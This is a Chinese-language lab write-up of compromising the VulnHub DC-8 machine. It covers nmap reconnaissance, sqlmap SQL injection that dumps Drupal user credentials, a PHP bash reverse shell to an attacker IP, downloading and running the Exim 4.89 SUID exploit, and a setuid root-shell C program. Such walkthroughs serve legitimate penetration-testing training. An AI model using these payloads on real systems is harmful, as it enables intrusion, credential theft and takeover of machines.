从Web渗透到Root权限：DC-8靶机实战提权全解析

1. 环境准备与信息收集

在开始渗透测试之前，我们需要搭建一个合适的实验环境。DC-8靶机是VulnHub上非常经典的渗透测试练习靶场，基于Drupal 7 CMS构建。我建议使用VMware或VirtualBox来运行这个靶机，同时准备一台Kali Linux作为攻击机。这里有个小技巧：把两台虚拟机都设置为NAT网络模式，这样它们会自动处于同一网段，省去手动配置IP的麻烦。

信息收集是渗透测试的第一步，也是最重要的一步。我习惯先用netdiscover快速定位靶机IP：

netdiscover -r 192.168.108.0/24

确认靶机IP后（比如192.168.108.141），接下来用nmap进行详细扫描。这里我有个私人技巧：加上-T4参数可以加快扫描速度，但可能会漏掉一些信息，所以初次扫描建议用默认速度：

nmap -sV -p- 192.168.108.141

扫描结果显示开放了22端口（SSH）和80端口（HTTP）。看到Apache服务时，我立即想到要检查Web服务器版本和可能的漏洞。Drupal 7是个老版本CMS，存在不少已知漏洞，这为我们后续的渗透提供了突破口。

2. Web应用漏洞利用

2.1 SQL注入漏洞挖掘

访问靶机Web界面后，我注意到URL中有?nid=1这样的参数。这种传参方式在老旧CMS中经常存在SQL注入风险。我习惯先用手动测试确认漏洞存在，再用sqlmap自动化利用：

sqlmap -u "http://192.168.108.141/?nid=1" --risk=3 --level=5

在实战中我发现，直接使用--dump-all可能会触发防护机制，所以我更喜欢逐步获取数据。先确认当前数据库：

sqlmap -u "http://192.168.108.141/?nid=1" --current-db

确认是d7db数据库后，再获取users表的数据。这里有个细节：Drupal的密码哈希是加盐的，直接用john破解可能效率很低。我通常会先尝试常见弱口令：

sqlmap -u "http://192.168.108.141/?nid=1" --dump -T users -D d7db

2.2 后台登录与代码执行

通过SQL注入获取的admin和john用户凭据中，john的密码"turtle"被成功破解。登录后台后，我发现在"Content"部分可以编辑PHP代码。这里要注意：不是所有Drupal版本都允许直接执行PHP，需要找对输入点。

我测试过多种PHP反弹shell的方式，发现以下这种最稳定：

<?php system("bash -c 'bash -i >& /dev/tcp/192.168.108.129/6868 0>&1'"); ?>

在Kali上需要先开启监听：

nc -lvnp 6868

获取shell后，记得先升级为交互式shell：

python -c 'import pty; pty.spawn("/bin/bash")'

3. 权限提升与Root获取

3.1 SUID权限检查

拿到www-data权限后，我立即检查SUID文件：

find / -perm -4000 -type f 2>/dev/null

发现exim4具有SUID权限，这是个重大突破口。检查版本：

exim4 --version

确认是4.89版本后，我搜索了相关漏洞。在实战中，直接使用searchsploit找到的46996.sh脚本有时会失败，所以我做了以下改进：

1. 先在本地搭建HTTP服务：

python -m SimpleHTTPServer 9999

2. 在靶机下载并修改脚本：

wget http://192.168.108.129:9999/46996.sh -O /tmp/exploit.sh chmod +x /tmp/exploit.sh

3. 执行时添加netcat选项更可靠：

/tmp/exploit.sh -m netcat

3.2 利用Exim漏洞提权

这个漏洞利用了exim在特定参数下的权限提升问题。执行脚本后，我发现有时需要多次尝试才能成功。关键是要确保netcat监听端口不被占用：

./46996.sh -m netcat

成功后会获得root权限的shell。这时候不要急着找flag，先稳定shell：

python -c 'import pty; pty.spawn("/bin/bash")'

最后在/root目录下找到flag文件。整个过程中，最关键的其实是信息收集阶段，准确识别出exim版本和对应的漏洞。

4. 渗透测试经验总结

在实际操作DC-8靶机时，有几个容易踩坑的地方需要特别注意。首先是SQL注入阶段，Drupal 7的密码哈希破解可能需要很长时间，不如直接找代码执行点更高效。其次在反弹shell时，我发现使用bash -i比nc -e更可靠，特别是在较新版本的Linux系统上。

关于权限提升，除了exim4之外，我还尝试了其他SUID提权方法。比如查找可写目录：

find / -writable -type d 2>/dev/null

有时候上传自定义的SUID二进制文件也是可行方案：

#include <stdlib.h> #include <unistd.h> int main() { setuid(0); system("/bin/bash"); return 0; }

编译后设置SUID权限：

gcc -o rootshell rootshell.c chmod +s rootshell

在DC-8靶机中，exim4提权是最直接的路径。整个过程让我深刻体会到，渗透测试中耐心和细致比炫技更重要。每个步骤都要确认结果，不能想当然。比如在获取初始shell后，我总会习惯性检查当前用户权限、网络配置和重要文件位置，这些信息往往能为后续提权提供关键线索。